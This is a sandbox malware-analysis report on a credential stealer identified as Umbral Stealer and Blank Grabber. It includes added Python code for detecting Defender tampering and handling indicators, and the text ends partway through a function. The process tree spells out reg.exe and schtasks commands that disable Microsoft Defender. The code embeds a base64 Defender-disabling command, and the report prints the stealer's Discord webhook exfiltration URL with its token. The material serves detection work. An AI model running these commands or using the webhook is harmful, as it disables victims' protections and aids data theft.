Windows Analysis Report
wKj1CBkbos.exe

Overview

General Information

Sample name: wKj1CBkbos.exe (renamed because the original name is a hash value)
Original sample name: E3A480A53D8B2C398A7642E1F4E84785.exe
Analysis ID: 1545326
MD5: e3a480a53d8b2c398a7642e1f4e84785
SHA1: 7f8fa5e3dc9be9055f9202213be33460a1af1e09
SHA256: 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2
Tags: DCRat, exe, user-abuse_ch

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates files with lurking names (e.g. Crack.exe)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Sigma detected: Disable Important Scheduled Task
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by executing a special instruction (VM detection)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wKj1CBkbos.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\wKj1CBkbos.exe" MD5: E3A480A53D8B2C398A7642E1F4E84785)
    • 52cheatand52rat.exe (PID: 4420 cmdline: "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" MD5: 06129FFC46E854930CFCAA754CA1D487)
      • WMIC.exe (PID: 5164 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Primordial Crack.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" MD5: BBD6FFDB33259778F08704696A04891F)
      • Lunch LaCheatV2.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" MD5: 7DB5128F7A81CC1AF094D8898E79FF21)
      • cmd.exe (PID: 2976 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 3192 cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 5532 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3220 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 6548 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 5668 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 2848 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 5676 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 4016 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 7020 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3476 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 6824 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3756 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 988 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3704 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 5704 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 6368 cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6568 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4460 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5172 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5956 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5724 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4180 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6452 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2144 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2992 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6596 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5340 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2120 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3796 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2732 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • schtasks.exe (PID: 2100 cmdline: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 3192 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 5532 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 5724 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 5608 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
  • cleanup
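Detection logic for the Defender-tampering chain in the process tree above, added here as a worked example; it is not Joe Sandbox code and not part of the sample. It treats each process-creation event as a (pid, cmdline) pair, a simplification of a Sysmon Event ID 1 or Security 4688 record. The event list is constructed from the reg.exe and schtasks.exe command lines in the tree, plus synthetic lines (PIDs 9001 to 9004) that are not in the report. The same detector decodes the Base64 string the System Summary lists for 52cheatand52rat.exe, which is a Set-MpPreference command that switches off real-time monitoring and sample submission, and it generalizes to PowerShell -EncodedCommand (UTF-16LE) blobs, which this sample does not use. Technique labels and the HKEY_LOCAL_MACHINE folding are this example's own choices.

```python
"""Flag Microsoft Defender tampering in process-creation command lines.

Added example for this report (not Joe Sandbox code, not part of the sample).
Events are (pid, cmdline) pairs, a simplification of a Sysmon Event ID 1 or
Security 4688 record; sample events are constructed from the process tree
in this report plus synthetic lines marked as such.
"""
import base64
import re

# Keys the sample writes with reg.exe: the Defender policy hive and the two ETW
# autologgers that carry Defender telemetry. Any add/delete under these prefixes
# is tampering, whatever the value name.
DEFENDER_POLICY_KEYS = (
    r"hklm\software\policies\microsoft\windows defender",
    r"hklm\system\currentcontrolset\control\wmi\autologger\defenderapilogger",
    r"hklm\system\currentcontrolset\control\wmi\autologger\defenderauditlogger",
)
# Task folders the sample disables with schtasks /Change ... /Disable.
DEFENDER_TASK_PREFIXES = (r"microsoft\windows\windows defender", r"microsoft\windows\exploitguard")

REG_WRITE = re.compile(r'\breg(?:\.exe)?\s+(add|delete)\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_DISABLE = re.compile(r'\bschtasks(?:\.exe)?\s+/change\s+/tn\s+"([^"]+)"\s+/disable\b', re.I)
# Set-MpPreference switches that weaken Defender. The sample stores such a command
# base64-encoded: UMBRAL_B64 is the string listed under System Summary in this report.
MPPREF_TAMPER = re.compile(
    r"set-mppreference\b(?=.*?(?:-disable\w+\s+\$true|-mapsreporting\s+disabled"
    r"|-submitsamplesconsent\s+(?:neversend|2)\b|-enablecontrolledfolderaccess\s+disabled))",
    re.I | re.S,
)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
UMBRAL_B64 = (
    "U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FW"
    "UHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5u"
    "aW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVj"
    "dGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBO"
    "ZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy"
)


def decode_report_string(b64: str) -> str:
    """Decode a base64 .NET string constant as the report's decompiler view shows it."""
    return base64.b64decode(b64).decode("utf-8")


def decoded_blobs(cmdline: str):
    """Yield plaintext for each base64-looking run, trying UTF-8 (a .NET constant, as in
    this sample) and UTF-16LE (PowerShell -EncodedCommand); undecodable runs are skipped."""
    for m in B64_BLOB.finditer(cmdline):
        raw = m.group(0)
        try:
            data = base64.b64decode(raw + "=" * (-len(raw) % 4), validate=True)
        except ValueError:
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                yield data.decode(enc)
            except UnicodeDecodeError:
                pass


def classify(cmdline: str):
    """Return (technique, detail) when a command line tampers with Defender, else None."""
    m = REG_WRITE.search(cmdline)
    if m:
        # Lower-case, drop a trailing backslash, fold HKEY_LOCAL_MACHINE onto HKLM.
        key = (m.group(2) or m.group(3)).lower().rstrip("\\").replace("hkey_local_machine", "hklm", 1)
        if key.startswith(DEFENDER_POLICY_KEYS):
            return "defender_policy_registry", f"reg {m.group(1).lower()} {key}"
    m = TASK_DISABLE.search(cmdline)
    if m and m.group(1).lower().startswith(DEFENDER_TASK_PREFIXES):
        return "defender_task_disabled", m.group(1)
    if MPPREF_TAMPER.search(cmdline):
        return "set_mppreference_plaintext", cmdline[:80]
    for text in decoded_blobs(cmdline):
        if MPPREF_TAMPER.search(text):
            return "set_mppreference_encoded", text[:80]
    return None


def scan(events):
    """Run classify() over (pid, cmdline) events; return findings in event order."""
    findings = []
    for pid, cmdline in events:
        hit = classify(cmdline)
        if hit:
            findings.append({"pid": pid, "technique": hit[0], "detail": hit[1]})
    return findings


# Constructed events. PIDs 3192..2100 and their command lines are taken from the
# process tree in this report; PIDs 9001..9004 are synthetic and not in the report.
ENCODED_PS = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    (3192, r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f'),
    (5532, r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'),
    (4016, r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'),
    (3704, r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'),
    (5724, r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    (2100, r'schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable'),
    # Synthetic: the report's base64 string run as a plain PowerShell command line
    # (the sandbox run shows no powershell.exe process; this is how it would look).
    (9001, "powershell " + decode_report_string(UMBRAL_B64)),
    # Synthetic: the same intent hidden behind -EncodedCommand (UTF-16LE base64).
    (9002, "powershell.exe -NoProfile -EncodedCommand " + ENCODED_PS),
    # Synthetic benign lines that must not fire: reading the key, querying the task.
    (9003, r'reg query "HKLM\Software\Policies\Microsoft\Windows Defender" /s'),
    (9004, r'schtasks /Query /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f['pid']:>5}  {f['technique']:<27} {f['detail']}")
```

Run as a script it prints eight findings: four registry writes, two disabled tasks, and the two PowerShell forms. The reg query and schtasks /Query lines do not fire, which is the specificity a rule keyed only on "reg.exe touching Windows Defender" would lack. In a real pipeline the same functions run over the CommandLine field of each event; matching on the key prefix rather than individual value names also catches variants that set values this sample does not.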
{"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
Source | Rule | Description | Author | Strings
wKj1CBkbos.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
wKj1CBkbos.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
wKj1CBkbos.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen
  • 0x33df4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x33f7a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x34016:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen
  • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
(7 further entries not shown in this export)

Source | Rule | Description | Author | Strings
2.0.52cheatand52rat.exe.1bc02440000.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
2.0.52cheatand52rat.exe.1bc02440000.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
2.0.52cheatand52rat.exe.1bc02440000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen
  • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.3.wKj1CBkbos.exe.13e55f0.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
0.3.wKj1CBkbos.exe.13e55f0.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
(13 further entries not shown in this export)

System Summary

Source: Process started | Sigma rule: Disable Important Scheduled Task | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5704, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, ProcessId: 2100, ProcessName: schtasks.exe
No Suricata rule has matched

AV Detection

Source: wKj1CBkbos.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: wKj1CBkbos.exe | Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | ReversingLabs: Detection: 92%
Source: wKj1CBkbos.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Joe Sandbox ML: detected
Source: wKj1CBkbos.exe | Joe Sandbox ML: detected
Source: wKj1CBkbos.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Networking

Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: 52cheatand52rat.exe, 00000002.00000002.2218560821.000001BC1CA1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gstatic.com
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04409000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr | String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC0437E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 52cheatand52rat.exe.0.dr | String found in binary or memory: https://discord.com/api/v10/users/
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr | String found in binary or memory: https://discordapp.com/api/v9/users/
Source: 52cheatand52rat.exe.0.dr | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr | String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: reg.exe | Process created: 67
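Handling the extracted C2 as an indicator, added here as a worked example (not Joe Sandbox code and not part of the sample). The configuration string is the one this report prints, including the trailing space the extractor left inside the URL before the closing quote; discord.com and discordapp.com are both taken from the sample's strings above. The example goes one step beyond the report by reading the creation time out of the webhook ID, which is a Discord snowflake (the top 42 bits are milliseconds since Discord's documented epoch of 2015-01-01 UTC). The returned field names and the non-matching test URL are this example's own.

```python
"""Normalize the extracted Discord webhook C2 into blocklist-ready indicators.

Added example for this report (not Joe Sandbox or sample code). CONFIG_TEXT is
the extractor output printed in this report, trailing space included.
"""
import json
import re
from datetime import datetime, timezone

# Verbatim from the report; note the space before the closing quote of the URL.
CONFIG_TEXT = ('{"C2 url": "https://discord.com/api/webhooks/1266665187293794356/'
               'BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", '
               '"Version": "v1.3"}')

# Both hosts appear in the sample's strings and serve the same webhook. The numeric
# part is a Discord snowflake (the webhook ID); the last segment is the secret token.
WEBHOOK = re.compile(r"^https://(?:discord|discordapp)\.com/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]+)$")
DISCORD_EPOCH_MS = 1420070400000  # Discord's documented snowflake epoch, 2015-01-01T00:00:00Z


def snowflake_time(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake: bits 22..63 are ms since the epoch."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def parse_webhook(raw_url: str):
    """Return normalized indicators for a webhook URL, or None if it is not one.

    Whitespace is stripped first: an exact-match blocklist fed the extractor's
    output unchanged would never match the URL the sample actually requests.
    """
    url = raw_url.strip()
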